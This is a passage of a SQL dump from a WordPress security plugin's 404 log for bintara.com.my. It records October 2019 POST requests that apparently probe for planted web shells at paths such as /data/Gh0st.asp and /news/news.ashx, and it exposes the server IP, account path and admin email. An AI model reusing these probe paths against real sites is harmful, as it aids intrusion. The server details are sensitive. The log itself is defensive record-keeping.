:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanyUQVftBBpAv@TWWu7VwAAAEI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418707.9888\";s:12:\"REQUEST_TIME\";s:10:\"1571418707\";}}','notice','2019-10-18 17:11:55','2019-10-18 17:11:50',35270984,37083312,'http://bintara.com.my//asp/main.cer',1,0,'121.49.175.169'),(28297,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//asp/main.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"123.246.7.93\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"123.246.7.93\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/asp/main.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/asp/main.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanyUjb0aNPHKDUVqhNYEAAAAVE\";s:12:\"REDIRECT_URL\";s:13:\"/asp/main.cer\";s:11:\"REMOTE_ADDR\";s:15:\"183.167.168.137\";s:11:\"REMOTE_PORT\";s:5:\"15464\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/asp/main.cer\";s:10:\"SCRIPT_URL\";s:13:\"/asp/main.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanyUjb0aNPHKDUVqhNYEAAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418708.1578\";s:12:\"REQUEST_TIME\";s:10:\"1571418708\";}}','notice','2019-10-18 17:11:55','2019-10-18 17:11:50',35343968,37144120,'http://bintara.com.my//asp/main.cer',1,0,'123.246.7.93'),(28298,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//news/news.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"210.51.126.200\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"210.51.126.200\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/news/news.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/news/news.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanyXt@tMXWkyeodXCWLdgAAAYE\";s:12:\"REDIRECT_URL\";s:15:\"/news/news.ashx\";s:11:\"REMOTE_ADDR\";s:15:\"183.167.168.137\";s:11:\"REMOTE_PORT\";s:5:\"13418\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/news/news.ashx\";s:10:\"SCRIPT_URL\";s:15:\"/news/news.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanyXt@tMXWkyeodXCWLdgAAAYE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418718.4791\";s:12:\"REQUEST_TIME\";s:10:\"1571418718\";}}','notice','2019-10-18 17:12:00','2019-10-18 17:11:59',35265256,37060504,'http://bintara.com.my//news/news.ashx',1,0,'210.51.126.200'),(28299,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//news/news.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"123.249.60.22\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"123.249.60.22\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/news/news.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/news/news.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanydAVftBBpAv@TWWu7dgAAAEU\";s:12:\"REDIRECT_URL\";s:15:\"/news/news.ashx\";s:11:\"REMOTE_ADDR\";s:15:\"183.167.168.137\";s:11:\"REMOTE_PORT\";s:5:\"15609\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/news/news.ashx\";s:10:\"SCRIPT_URL\";s:15:\"/news/news.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanydAVftBBpAv@TWWu7dgAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418740.9993\";s:12:\"REQUEST_TIME\";s:10:\"1571418740\";}}','notice','2019-10-18 17:12:22','2019-10-18 17:12:21',35266616,37057936,'http://bintara.com.my//news/news.ashx',1,0,'123.249.60.22'),(28300,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//js/index.php\";s:14:\"CONTENT_LENGTH\";s:3:\"298\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"61.133.3.52\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"61.133.3.52\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/js/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/js/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanyjwVftBBpAv@TWWu7kAAAAE8\";s:12:\"REDIRECT_URL\";s:13:\"/js/index.php\";s:11:\"REMOTE_ADDR\";s:15:\"183.167.168.137\";s:11:\"REMOTE_PORT\";s:5:\"16828\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/js/index.php\";s:10:\"SCRIPT_URL\";s:13:\"/js/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanyjwVftBBpAv@TWWu7kAAAAE8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418767.4513\";s:12:\"REQUEST_TIME\";s:10:\"1571418767\";}}','notice','2019-10-18 17:12:49','2019-10-18 17:12:47',35265176,37080032,'http://bintara.com.my//js/index.php',1,0,'61.133.3.52'),(28301,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"//ranggou.PhP\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.139.220.152\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.139.220.152\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"http://bintara.com.my/ranggou.PhP\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/ranggou.PhP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xanyod@tMXWkyeodXCWLhwAAAYk\";s:12:\"REDIRECT_URL\";s:12:\"/ranggou.PhP\";s:11:\"REMOTE_ADDR\";s:15:\"183.167.168.137\";s:11:\"REMOTE_PORT\";s:5:\"13965\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"http://bintara.com.my/ranggou.PhP\";s:10:\"SCRIPT_URL\";s:12:\"/ranggou.PhP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xanyod@tMXWkyeodXCWLhwAAAYk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418785.7321\";s:12:\"REQUEST_TIME\";s:10:\"1571418785\";}}','notice','2019-10-18 17:13:08','2019-10-18 17:13:06',35260672,37059248,'http://bintara.com.my//ranggou.PhP',1,0,'61.139.220.152'),(28302,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//data/Gh0st.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.141.201.73\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.141.201.73\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/data/Gh0st.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/data/Gh0st.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xany2Tb0aNPHKDUVqhNYHwAAAVM\";s:12:\"REDIRECT_URL\";s:15:\"/data/Gh0st.asp\";s:11:\"REMOTE_ADDR\";s:13:\"27.31.102.111\";s:11:\"REMOTE_PORT\";s:5:\"49972\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/data/Gh0st.asp\";s:10:\"SCRIPT_URL\";s:15:\"/data/Gh0st.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xany2Tb0aNPHKDUVqhNYHwAAAVM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418841.2413\";s:12:\"REQUEST_TIME\";s:10:\"1571418841\";}}','notice','2019-10-18 17:14:04','2019-10-18 17:14:01',35338424,37139528,'http://bintara.com.my//data/Gh0st.asp',1,0,'211.141.201.73'),(28303,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//data/Gh0st.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.161.64.233\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.161.64.233\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/data/Gh0st.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/data/Gh0st.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xany4gVftBBpAv@TWWu7ywAAAEU\";s:12:\"REDIRECT_URL\";s:15:\"/data/Gh0st.asp\";s:11:\"REMOTE_ADDR\";s:13:\"27.31.102.111\";s:11:\"REMOTE_PORT\";s:5:\"50273\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/data/Gh0st.asp\";s:10:\"SCRIPT_URL\";s:15:\"/data/Gh0st.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xany4gVftBBpAv@TWWu7ywAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418850.4424\";s:12:\"REQUEST_TIME\";s:10:\"1571418850\";}}','notice','2019-10-18 17:14:12','2019-10-18 17:14:10',35265896,37077160,'http://bintara.com.my//data/Gh0st.asp',1,0,'61.161.64.233'),(28304,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//ctwet/md5.ph\";s:14:\"CONTENT_LENGTH\";s:3:\"298\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.41.147.204\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.41.147.204\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/ctwet/md5.ph\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/ctwet/md5.ph\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xany@8DvTLQMcXIRTTl0ZgAAAgM\";s:12:\"REDIRECT_URL\";s:13:\"/ctwet/md5.ph\";s:11:\"REMOTE_ADDR\";s:13:\"27.31.102.111\";s:11:\"REMOTE_PORT\";s:5:\"50996\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/ctwet/md5.ph\";s:10:\"SCRIPT_URL\";s:13:\"/ctwet/md5.ph\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xany@8DvTLQMcXIRTTl0ZgAAAgM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571418875.305\";s:12:\"REQUEST_TIME\";s:10:\"1571418875\";}}','notice','2019-10-18 17:14:37','2019-10-18 17:14:35',35268880,37076200,'http://bintara.com.my//ctwet/md5.ph',1,0,'202.41.147.204'),(28305,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//ctwet/md5.ph\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"210.31.67.149\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"210.31.67.149\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/ctwet/md5.ph\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/ctwet/md5.ph\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanzGwVftBBpAv@TWWu75QAAAFY\";s:12:\"REDIRECT_URL\";s:13:\"/ctwet/md5.ph\";s:11:\"REMOTE_ADDR\";s:13:\"27.31.102.111\";s:11:\"REMOTE_PORT\";s:5:\"52031\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/ctwet/md5.ph\";s:10:\"SCRIPT_URL\";s:13:\"/ctwet/md5.ph\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanzGwVftBBpAv@TWWu75QAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418908.0144\";s:12:\"REQUEST_TIME\";s:10:\"1571418908\";}}','notice','2019-10-18 17:15:11','2019-10-18 